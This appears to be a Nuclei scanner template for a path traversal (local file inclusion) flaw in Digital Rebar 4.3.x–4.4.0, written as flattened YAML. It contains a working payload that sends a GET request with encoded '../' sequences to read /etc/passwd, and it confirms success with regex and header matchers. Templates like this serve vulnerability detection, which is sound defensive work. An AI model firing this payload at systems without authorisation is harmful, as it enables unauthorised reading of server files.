id: digitalrebar-traversal info: name: Digital Rebar - Local File Inclusion author: c-sh0 severity: high description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas. reference: - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html - https://docs.rackn.io/en/latest/doc/release.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: lfi,rackn,digitalrebar metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - type: word part: header words: - 'X-Drp-Sha256sum:' - type: status status: - 200